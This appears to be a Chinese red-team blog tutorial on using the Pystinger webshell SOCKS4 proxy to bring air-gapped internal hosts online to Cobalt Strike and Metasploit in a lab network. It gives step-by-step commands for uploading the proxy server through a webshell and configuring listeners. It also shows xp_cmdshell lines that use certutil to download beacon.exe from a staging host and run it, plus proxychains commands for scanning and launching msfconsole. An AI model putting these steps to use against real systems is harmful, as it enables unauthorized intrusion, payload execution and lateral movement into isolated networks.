利用Pystinger Socks4上线不出网主机

简介: 利用Pystinger Socks4上线不出网主机

我们接着前两篇文章继续分享一篇利用Pystinger Socks4代理方式上线不出网主机的姿势,包括单主机和内网多台主机的两种常见场景!!!


项目地址:https://github.com/FunnyWolf/pystinger


相关阅读:

1、利用MSF上线断网主机的思路分享

2、利用goproxy http上线不出网主机


0x01 测试环境

    攻击机(Kali):192.168.56.101
    受害机1(Web):192.168.56.102、192.168.186.3 - 双网卡
    受害机2(Data):192.168.186.4 - 断网机


    0x02 Pystinger简单介绍

    Pystinger由服务端webshellstinger_server和客户端stinger_client两部分组成,可通过webshell实现内网SOCK4代理及端口映射,支持php/jsp(x)/aspx三种代理脚本。


    webshell只负责流量转发,大部分建立连接及处理数据的工作由stinger_server完成,stinger_client则用于接收转发过来的流量数据以及与CS/MSF的listener建立TCP连接等。


    大致原理如下图,更为详细的原理分析可阅读“奇安信安全服务”公众号中的“红队攻防实践:不出网主机搭建内网隧道新思路”一文进行学习了解。


    0x03 Pystinger上线不出网主机

    我们先将Pystinger项目的服务端stinger_server.exe、proxy.aspx通过中国菜刀上传至目标磁盘可读写目录中,访问proxy.aspx返回UTF-8表示正常,接着执行以下命令启动服务端。

      start C:\inetpub\wwwroot\stinger_server.exe 0.0.0.0


      注:作者提示不要直接运行D:/XXX/stinger_server.exe,因为这样可能会导致TCP断连。


      将客户端stinger_client上传至Kali攻击机的tmp临时目录,然后再执行以下命令将Socks4的代理流量转发到我们Kali攻击机60000端口上,只要把-w参数替换为自己上传的代理脚本地址即可。

        root@kali:/tmp# chmod 777 stinger_client
        root@kali:/tmp# ./stinger_client -w http://192.168.56.102/proxy.aspx -l 127.0.0.1 -p 60000

        场景1:单主机上线

        已控主机为单主机,不出外网且仅允许访问目标Web的80端口。如遇这种场景时可在执行完以上操作后在CobaltStrike创建一个Listener,HTTP Hosts填127.0.0.1,HTTP Port填60020

        场景2:多主机上线

        已控主机为内网其中一台主机,双网卡(192.168.56.X为出网段,192.168.186.X为不出网段),在对不出网段中的其他内网主机进行横向移动上线时可在执行完以上操作后在CobaltStrike创建一个Listener,HTTP Hosts填192.168.186.3,HTTP Port填60020


        配置好监听后生成一个可执行马儿,将该文件放至192.168.186.3的Web服务器中供192.168.186.4断网数据库服务器下载,再利用xp_cmdshell组件执行beacon.exe后即可成功上线,Pystinger客户端那边也收到了相关连接数据。

          EXEC master..xp_cmdshell 'certutil -urlcache -split -f http://192.168.186.3/beacon.exe C:\ProgramData\beacon.exe'
          EXEC master..xp_cmdshell 'C:\ProgramData\beacon.exe'

          CobaltStrike监听设置

          • 单主机上线:CobaltStrike->Listeners->Add->127.0.0.1:60020
          • 多主机上线:CobaltStrike->Listeners->Add->192.168.186.3:60020
          • 注:目标主机为双网卡时必须用不出网IP段的内网IP地址进行监听才能上线不出网主机;


          上线至MSF的利用姿势

          Kali攻击机上编辑/etc/proxychains.conf文件,底部添加一条socks4代理:127.0.0.1:60000,添加完成后先执行以下几条命令来验证下是否已经与不出网IP段通了?

            root@kali:~# proxychains telnet 192.168.186.4 1433
            root@kali:~# proxychains curl http://192.168.186.4
            root@kali:~# proxychains nmap -sT -Pn 192.168.186.4
            [...SNIP...]


            如果通了就再用proxychains来启动msfconsole,用不出网IP段的内网IP地址进行监听即可。原理大家都懂,就不实操截图了...。

              root@kali:~# proxychains msfconsole -q
              [...SNIP...]
              相关文章
              |
              11月前
              |
              Go
              socks5 搭建代理服务
              socks5 搭建代理服务
              508 0
              socks5在服务器运行正常 但始络无法连接
              配置好socks5代理 服务器都运行正常 无法连接
              socks5在服务器运行正常 但始络无法连接
              |
              5月前
              |
              监控 网络协议 安全
              【亮剑】当设备IP能ping通但无法上网时,可能是DNS解析、网关/路由设置、防火墙限制、网络配置错误或ISP问题
              【4月更文挑战第30天】当设备IP能ping通但无法上网时,可能是DNS解析、网关/路由设置、防火墙限制、网络配置错误或ISP问题。解决步骤包括检查网络配置、DNS设置、网关路由、防火墙规则,以及联系ISP。预防措施包括定期备份配置、更新固件、监控网络性能和实施网络安全策略。通过排查和维护,可确保网络稳定和安全。
              1013 1
              |
              安全 网络安全 网络虚拟化
              企业路由器配置PPTP PC到站点模式VPN指南(外网访问内网资源)
              企业路由器配置PPTP PC到站点模式VPN指南(外网访问内网资源)
              318 0
              |
              测试技术 数据库 Windows
              利用goproxy http上线不出网主机
              利用goproxy http上线不出网主机
              107 0
              |
              Unix Linux 网络安全
              使用RPC和Squid搭建代理实现在校外使用外网 访问校园网解决办法
              使用RPC和Squid搭建代理实现在校外使用外网 访问校园网解决办法
              498 0
              使用RPC和Squid搭建代理实现在校外使用外网 访问校园网解决办法
              内网安全-内网漫游Socks代理隧道技术
              内网安全-内网漫游Socks代理隧道技术
              |
              Web App开发 JavaScript 前端开发
              IP电话交换机Web服务器部署方法二
              操作要求:需要对 Web 编程熟悉的人进行部署和使用 目的:方便用户实现 Web 网站的客户点击拨号,实现咨询服务。
              |
              域名解析 网络协议 Shell
              内网隧道与SOCKS代理思路总结
              内网中有很多边界设备,比如防火墙。这种边界设备会控制内部主机的对外连接,一般会仅允许某些种类的端口开放或某种数据流量出入 这就意味着我们只能通过有限的选择,来绕过防火墙限制,与目标内网中的机器通信,这就需要隧道了,外观表现为各种端口转发连接,深层次还是隧道的思想 一般按照OSI模型也把隧道按照不同层的协议划分为网络层隧道、传输层隧道、应用层隧道,按部就班(老套路了) 本文只做思路总结,比较简单(懒)没啥演示的空间....... 如果有跨网段不通的地方请脑补自行添加路由
              823 0
              内网隧道与SOCKS代理思路总结